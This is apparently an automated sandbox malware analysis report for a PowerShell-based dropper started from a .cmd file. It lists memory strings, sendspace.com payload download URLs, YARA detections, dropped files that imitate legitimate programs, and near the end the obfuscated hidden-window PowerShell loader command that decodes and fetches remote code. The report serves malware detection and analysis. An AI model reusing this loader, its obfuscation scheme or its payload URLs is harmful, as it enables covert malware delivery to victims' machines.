              Source: jucheck.exe.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: jucheck.exe.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: jucheck.exe.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: jucheck.exe.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: jucheck.exe.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: jucheck.exe.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: jucheck.exe.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: jucheck.exe.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: jucheck.exe.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
              Source: jucheck.exe.9.drString found in binary or memory: http://es5.github.io/#x15.4.4.21
              Source: powershell.exe, 00000002.00000002.2504527085.000002505A59A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fs03n4.sendspace.com
              Source: jucheck.exe.9.drString found in binary or memory: http://java.sun.com
              Source: jucheck.exe.9.drString found in binary or memory: http://java.sun.comnot
              Source: wab.exe, 00000009.00000002.2799289733.0000000022290000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: powershell.exe, 00000002.00000002.2581460938.000002506881F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2407208321.0000000006097000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: jucheck.exe.9.drString found in binary or memory: http://ocsp.digicert.com0
              Source: jucheck.exe.9.drString found in binary or memory: http://ocsp.digicert.com0A
              Source: jucheck.exe.9.drString found in binary or memory: http://ocsp.digicert.com0C
              Source: jucheck.exe.9.drString found in binary or memory: http://ocsp.digicert.com0X
              Source: powershell.exe, 00000006.00000002.2403153242.000000000518C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: officeappguardwin32.exe.9.drString found in binary or memory: http://schemas.datacontract.org/2004/07/Microsoft.Office.Web.Roaming.Service
              Source: officeappguardwin32.exe.9.drString found in binary or memory: http://schemas.datacontract.org/2004/07/Microsoft.Office.Web.Roaming.SoapObjects
              Source: officeappguardwin32.exe.9.drString found in binary or memory: http://schemas.datacontract.org/2004/07/Microsoft.Office.Web.Roaming.SoapObjectsItemsSortKeyArrayOfR
              Source: powershell.exe, 00000002.00000002.2504527085.00000250587B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2403153242.0000000005031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: jucheck.exe.9.drString found in binary or memory: http://stackoverflow.com/a/1465386/4224163
              Source: jucheck.exe.9.drString found in binary or memory: http://stackoverflow.com/a/15123777)
              Source: jucheck.exe.9.drString found in binary or memory: http://stackoverflow.com/questions/1026069/capitalize-the-first-letter-of-string-in-javascript
              Source: jucheck.exe.9.drString found in binary or memory: http://stackoverflow.com/questions/1068834/object-comparison-in-javascript
              Source: officeappguardwin32.exe.9.drString found in binary or memory: http://tempuri.org/
              Source: officeappguardwin32.exe.9.drString found in binary or memory: http://tempuri.org/IRoamingSettingsService/DisableUser
              Source: officeappguardwin32.exe.9.drString found in binary or memory: http://tempuri.org/IRoamingSettingsService/DisableUserResponse
              Source: officeappguardwin32.exe.9.drString found in binary or memory: http://tempuri.org/IRoamingSettingsService/EnableUser
              Source: officeappguardwin32.exe.9.drString found in binary or memory: http://tempuri.org/IRoamingSettingsService/EnableUserResponse
              Source: officeappguardwin32.exe.9.drString found in binary or memory: http://tempuri.org/IRoamingSettingsService/GetConfig
              Source: officeappguardwin32.exe.9.drString found in binary or memory: http://tempuri.org/IRoamingSettingsService/GetConfigResponse
              Source: officeappguardwin32.exe.9.drString found in binary or memory: http://tempuri.org/IRoamingSettingsService/ReadSettings
              Source: officeappguardwin32.exe.9.drString found in binary or memory: http://tempuri.org/IRoamingSettingsService/ReadSettingsResponse
              Source: officeappguardwin32.exe.9.drString found in binary or memory: http://tempuri.org/IRoamingSettingsService/WriteSettings
              Source: officeappguardwin32.exe.9.drString found in binary or memory: http://tempuri.org/IRoamingSettingsService/WriteSettingsResponse
              Source: officeappguardwin32.exe.9.drString found in binary or memory: http://tempuri.org/IRoamingSettingsService/WriteSettingshttp://tempuri.org/IRoamingSettingsService/R
              Source: powershell.exe, 00000006.00000002.2403153242.000000000518C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: jucheck.exe.9.drString found in binary or memory: http://www.computerhope.com/forum/index.php?topic=76293.0
              Source: jucheck.exe.9.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: powershell.exe, 00000002.00000002.2504527085.000002505A561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sendspace.com
              Source: jucheck.exe.9.drString found in binary or memory: http://www.tutorialspoint.com/javascript/array_map.htm
              Source: powershell.exe, 00000002.00000002.2504527085.00000250587B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000006.00000002.2403153242.0000000005031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBjq
              Source: powershell.exe, 00000006.00000002.2407208321.0000000006097000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000006.00000002.2407208321.0000000006097000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000006.00000002.2407208321.0000000006097000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: jucheck.exe.9.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/Reduce
              Source: jucheck.exe.9.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/filter
              Source: jucheck.exe.9.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/indexOf
              Source: jucheck.exe.9.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/Trim
              Source: jucheck.exe.9.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/startsWith
              Source: jucheck.exe.9.drString found in binary or memory: https://developer.mozilla.org/en/docs/Web/JavaScript/Reference/Global_Objects/String/endsWith
              Source: powershell.exe, 00000002.00000002.2504527085.000002505A586000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fs03n4.sendspaX
              Source: powershell.exe, 00000002.00000002.2504527085.000002505A586000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2504527085.0000025058C43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fs03n4.sendspace.com
              Source: powershell.exe, 00000002.00000002.2504527085.0000025058C3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2504527085.000002505A582000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2504527085.000002505A561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2504527085.000002505A586000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2504527085.0000025058C43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fs03n4.sendspace.com/dlpro/81d69660376a5bce96e9e379357cd531/664f8719/i41a76/Semicylinder.psm
              Source: wab.exe, 00000009.00000003.2365648701.00000000069E2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2372986169.00000000069E2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2787822130.00000000069E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs13n1.sendspace.com/
              Source: wab.exe, 00000009.00000003.2365648701.00000000069E2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2372986169.00000000069E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs13n1.sendspace.com/=6
              Source: wab.exe, 00000009.00000003.2372986169.00000000069E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs13n1.sendspace.com/Z6:
              Source: wab.exe, 00000009.00000003.2365648701.00000000069CD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2787822130.00000000069BD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2787822130.00000000069BA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2365503757.00000000069E2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2372986169.00000000069CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs13n1.sendspace.com/dlpro/a249fc130e1351275114f8d6a64c794e/664f873c/12acii/aLnQbzJIDX45.bin
              Source: powershell.exe, 00000006.00000002.2403153242.000000000518C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: notification_click_helper.exe.9.drString found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff
              Source: notification_click_helper.exe.9.drString found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith
              Source: powershell.exe, 00000002.00000002.2504527085.0000025059A59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: jucheck.exe.9.drString found in binary or memory: https://javadl-esd-secure.oracle.com/update/%s/map-%s.xml
              Source: jucheck.exe.9.drString found in binary or memory: https://javadl-esd-secure.oracle.com/update/%s/map-m-%s.xml
              Source: jucheck.exe.9.drString found in binary or memory: https://javadl-esd-secure.oracle.com/update/%s/map-m-%s.xmlhttps://javadl-esd-secure.oracle.com/upda
              Source: powershell.exe, 00000002.00000002.2581460938.000002506881F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2407208321.0000000006097000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000002.00000002.2504527085.000002505A55C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2504527085.00000250589DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com
              Source: wab.exe, 00000009.00000002.2787822130.0000000006958000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/
              Source: wab.exe, 00000009.00000002.2787822130.0000000006958000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/J
              Source: wab.exe, 00000009.00000003.2365648701.00000000069CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pr
              Source: wab.exe, 00000009.00000002.2797826895.0000000021AD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/12acii
              Source: wab.exe, 00000009.00000002.2787822130.000000000699D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/12aciiBl
              Source: wab.exe, 00000009.00000002.2787822130.000000000699D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/12aciiyl
              Source: powershell.exe, 00000002.00000002.2504527085.00000250589DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/i41a76P
              Source: powershell.exe, 00000006.00000002.2403153242.000000000518C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/i41a76XRll
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownHTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.5:49713 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.5:49714 version: TLS 1.2
              Source: OfficeScrSanBroker.exe.9.drBinary or memory string: RegisterRawInputDevicesmemstr_5464500f-6

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: amsi32_5572.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 1716, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 5572, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Very long command line found
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6351
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6375
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6351Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6375Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Windows\svchost.comJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F1B8C22_2_00007FF848F1B8C2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F1AB162_2_00007FF848F1AB16
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04E7E9286_2_04E7E928
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04E7F1F86_2_04E7F1F8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04E7E5E06_2_04E7E5E0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_07A593986_2_07A59398
              Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\AutoIt3\Au3Check.exe 07FB7F6D9498BAE332E45617ACEA5CECB4186218AA8F1EB934AB2D48BA8FEB05
              Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\AutoIt3\Au3Info.exe 6805AA9ADE6C02506EE0E7E4DB52927B8336BC13FA3C10D9B4525B7297A61676
              Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe 4EC88EB380899460D7DF0DFC23E52CD4320306AAA2954AB78B1A5EF0CA3BD77C
              Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe 2B94D13DCF7D675C9A74E92FAC2B31C4DF2F392ACE777A94C89D431979E52A89
              Source: AppVDllSurrogate.exe.9.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
              Source: OcPubMgr.exe.9.drStatic PE information: Resource name: RT_ICON type: COM executable for DOS
              Source: OcPubMgr.exe.9.drStatic PE information: Resource name: RT_ICON type: COM executable for DOS
              Source: OcPubMgr.exe.9.drStatic PE information: Resource name: RT_ICON type: TTComp archive data, binary, 1K dictionary
              Source: OcPubMgr.exe.9.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: OcPubMgr.exe.9.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: OcPubMgr.exe.9.drStatic PE information: Resource name: RT_ICON type: COM executable for DOS
              Source: officeappguardwin32.exe.9.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
              Source: officeappguardwin32.exe.9.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
              Source: AppVDllSurrogate32.exe.9.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
              Source: AppVDllSurrogate64.exe.9.drStatic PE information: Resource name: RT_ICON type: TTComp archive data, binary, 1K dictionary
              Source: OfficeScrSanBroker.exe.9.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: OfficeScrSanBroker.exe.9.drStatic PE information: Resource name: RT_ICON type: 68k Blit mpx/mux executable
              Source: OfficeScrSanBroker.exe.9.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: OfficeScrSanBroker.exe.9.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: AppVLP.exe.9.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: Integrator.exe.9.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: PerfBoost.exe.9.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: PerfBoost.exe.9.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
              Source: MpCmdRun.exe.9.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: MpDlpCmd.exe.9.drStatic PE information: Resource name: RT_ICON type: COM executable for DOS
              Source: VC_redist.x64.exe.9.drStatic PE information: Resource name: RT_ICON type: VAX-order 68K Blit (standalone) executable
              Source: UcMapi.exe.9.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
              Source: UcMapi.exe.9.drStatic PE information: Resource name: RT_ICON type: COM executable for DOS
              Source: UcMapi.exe.9.drStatic PE information: Resource name: RT_ICON type: DOS executable (block device driver p\327G\200<)
              Source: ai.exe.9.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: ai.exe.9.drStatic PE information: Resource name: RT_ICON type: COM executable for DOS
              Source: ai.exe.9.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
              Source: ai.exe.9.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: integrator.exe.9.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: Au3Check.exe.9.drStatic PE information: Resource name: RT_GROUP_ICON type: DOS executable (COM, 0x8C-variant)
              Source: Aut2exe.exe.9.drStatic PE information: Resource name: RT_ICON type: 370 XA sysV executable not stripped - version 6657 - 5.2 format
              Source: Aut2exe_x64.exe.9.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: upx.exe.9.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
              Source: ai.exe0.9.drStatic PE information: Resource name: RT_ICON type: DOS executable (block device driver \240\357E)
              Source: SciTE.exe.9.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: Uninstall.exe.9.drStatic PE information: Resource name: RT_ICON type: COM executable for DOS
              Source: AdobeARMHelper.exe.9.drStatic PE information: Resource name: RT_ICON type: PDP-11 pure executable - version 69
              Source: AdobeARMHelper.exe.9.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
              Source: AdobeARMHelper.exe.9.drStatic PE information: Resource name: RT_ICON type: COM executable for DOS
              Source: jaureg.exe.9.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: jucheck.exe.9.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
              Source: jucheck.exe.9.drStatic PE information: Resource name: RT_ICON type: COM executable for DOS
              Source: jusched.exe.9.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
              Source: jusched.exe.9.drStatic PE information: Resource name: RT_ICON type: COM executable for DOS
              Source: OLicenseHeartbeat.exe.9.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: grv_icons.exe.9.drStatic PE information: Resource name: RT_ICON type: COM executable for DOS
              Source: java.exe.9.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: javaw.exe.9.drStatic PE information: Resource name: RT_ICON type: DitPack archive data
              Source: javaws.exe.9.drStatic PE information: Resource name: RT_ICON type: COM executable for DOS
              Source: GoogleCrashHandler.exe.9.drStatic PE information: Resource name: RT_ICON type: DOS executable (block device driver)
              Source: GoogleCrashHandler64.exe.9.drStatic PE information: Resource name: RT_ICON type: 386 compact demand paged pure executable not stripped
              Source: OcPubMgr.exe.9.drStatic PE information: Resource name: RT_ICON type: TTComp archive data, binary, 1K dictionary
              Source: AppVDllSurrogate64.exe.9.drStatic PE information: Resource name: RT_ICON type: TTComp archive data, binary, 1K dictionary
              Source: PerfBoost.exe.9.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: MpCmdRun.exe0.9.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: VSTOInstaller.exe.9.drStatic PE information: Data appended to the last section found
              Source: chrome.exe.9.drStatic PE information: Data appended to the last section found
              Source: grv_icons.exe.9.drStatic PE information: Data appended to the last section found
              Source: MpDlpCmd.exe.9.drStatic PE information: Data appended to the last section found
              Source: Au3Info_x64.exe.9.drStatic PE information: Data appended to the last section found
              Source: PerfBoost.exe.9.drStatic PE information: Data appended to the last section found
              Source: aimgr.exe0.9.drStatic PE information: Data appended to the last section found
              Source: SQLDumper.exe.9.drStatic PE information: Data appended to the last section found
              Source: Au3Check.exe.9.drStatic PE information: Data appended to the last section found
              Source: AppSharingHookController64.exe.9.drStatic PE information: Data appended to the last section found
              Source: Microsoft.Mashup.Container.Loader.exe.9.drStatic PE information: Data appended to the last section found
              Source: AutoIt3Help.exe.9.drStatic PE information: Data appended to the last section found
              Source: Uninstall.exe.9.drStatic PE information: Data appended to the last section found
              Source: armsvc.exe.9.drStatic PE information: Data appended to the last section found
              Source: AppVDllSurrogate32.exe.9.drStatic PE information: Data appended to the last section found
              Source: javaws.exe.9.drStatic PE information: Data appended to the last section found
              Source: msoev.exe.9.drStatic PE information: Data appended to the last section found
              Source: javaw.exe.9.drStatic PE information: Data appended to the last section found
              Source: MsMpEng.exe.9.drStatic PE information: Data appended to the last section found
              Source: aimgr.exe.9.drStatic PE information: Data appended to the last section found
              Source: java.exe.9.drStatic PE information: Data appended to the last section found
              Source: Au3Info.exe.9.drStatic PE information: Data appended to the last section found
              Source: ConfigSecurityPolicy.exe.9.drStatic PE information: Data appended to the last section found
              Source: MpCopyAccelerator.exe.9.drStatic PE information: Data appended to the last section found
              Source: Wordconv.exe.9.drStatic PE information: Data appended to the last section found
              Source: AdobeARMHelper.exe.9.drStatic PE information: Data appended to the last section found
              Source: Common.DBConnection.exe.9.drStatic PE information: Data appended to the last section found
              Source: SDXHelper.exe.9.drStatic PE information: Data appended to the last section found
              Source: upx.exe.9.drStatic PE information: Data appended to the last section found
              Source: GoogleCrashHandler.exe.9.drStatic PE information: Data appended to the last section found
              Source: AppVDllSurrogate.exe.9.drStatic PE information: Data appended to the last section found
              Source: AppSharingHookController.exe.9.drStatic PE information: Data appended to the last section found
              Source: GoogleCrashHandler64.exe.9.drStatic PE information: Data appended to the last section found
              Source: AppVLP.exe.9.drStatic PE information: Data appended to the last section found
              Source: AppVDllSurrogate64.exe.9.drStatic PE information: Data appended to the last section found
              Source: dbcicons.exe.9.drStatic PE information: Data appended to the last section found
              Source: amsi32_5572.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 1716, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 5572, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: VC_redist.x64.exe.9.drStatic PE information: Section: .reloc ZLIB complexity 1.0107421875
              Source: OfficeScrSanBroker.exe.9.drBinary string: \Device\Afd\WepollNtCreateFilentdll.dllNtReleaseKeyedEventRtlNtStatusToDosErrorNtDeviceIoControlFileNtWaitForKeyedEventNtCreateKeyedEventwsipcudptcppipe_ != NULLopensource\libzmq\src\channel.cpp%s (%s:%d)
              Source: classification engineClassification label: mal100.spre.troj.evad.winCMD@14/164@3/3
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Klavers.UenJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3580:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2836:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0bhgphdw.1ud.ps1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1716
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5572
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\kam.cmd" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Sanguinarily='Sub';$Sanguinarily+='strin';$Colour = 1;$Sanguinarily+='g';Function Circuted($Kropsvisiteret26){$Blazer=$Kropsvisiteret26.Length-$Colour;For($Tvrfljte=5;$Tvrfljte -lt $Blazer;$Tvrfljte+=6){$Intraperitoneally+=$Kropsvisiteret26.$Sanguinarily.Invoke( $Tvrfljte, $Colour);}$Intraperitoneally;}function Udkrte($Udmatningens){ . ($Polarizer) ($Udmatningens);}$Ontological=Circuted 'AlenlMGynobo AnimzCopiei Dekll UnbrlKaramaD,esk/ Abso5 edrr.C.apt0Clemp Notc(Dru,nWunifoiNailenPr.madCo.seoUnbuiwSheepsfrste MetalNUnderTL ndq Prede1Scrip0Postt.Penty0 dra.;Gidsl Spnd,WP ddii.rembnBa ng6 ,ram4B roc;Rkebi RaasxTermt6 D.ej4 Kn.r;Ringt LassorDiscjvCa.bi:archt1Bicen2Aftgt1O,tol. Sile0Sulfo)Diver Prof.G,fglaePen,acFalk,k Fi,hoNethi/Admir2Encin0Griff1 Tram0Cytis0M,tro1lufti0Kben 1Mech, ForblFDr.gaigkantrD,mmee Forrf gelsoSlag,x Sia./Lande1 Un i2Denot1Baand. E eb0 Sost ';$Pullouts=Circuted ' Eva,U,epousLu tleNonderMange- MellACamorgbkarveTo.fun UnpotZeppe ';$Skraaremmens=Circuted 'Gim ehLusketSidettSamlepcalcas Bo.i: Circ/Lseti/TruthwbackfwRegiswUbesl. karisDec neineq nCo kadBerylsRiotep lichaadaptcJenh,eGlott.BademcA osto .aktmD.ght/HydropDecimrH,spioDamas/Homeod.aretlXerot/ DesiiVi li4Gjord1 FreeaLupan7 alvf6 Loes ';$Spisestel=Circuted 'Bolte>Cubin ';$Polarizer=Circuted 'S irriFlykkeRa,idxKonst ';$Spiegeleisen='Decephalize';$Thermoremanent12 = Circuted ' Hecte Frejc,vigehPrem,oUdtry Udska%Klemea FolkpNogggpAgnindgvenda.odsetRegloaarchi%Krimi\uv.asKunivelNonada mishv PalbeTal,yrOmop sGassl.B,dstUAposteDyppen Eino .verl& Sprj&Te,no Scane Kongc ModehPollaojejun Varu tWindi ';Udkrte (Circuted 'Nonsy$IndisgFeriel,anneoUgerabOutlaaAnti l,rist:WillyNMytolo,rocenun ersStilitBraktuUnsh d FascySurli=Kdest(BeforcProtom OverdVolde Flers/Unde.cDisin Whabb$ G,amTHjemmh araleScarvrSe uemUsnoboKardirRoeddePeri,mHenhraI,difnLurefegerman .omet ,lle1Over 2Sub.e) ,und ');Udkrte (Circuted 'averr$Luf,egFaerdlTaphvoBru.sbArchpa Flytl Diss:TurnePTautoaResigrGorinaSel.kpNonaroNrmeldRev,l=Co.on$AkkusSSuperk C enrActedaOplseaAf,kir ilmeDi tam gattm T.leeLrlinnSk,bssPopul. fyris U 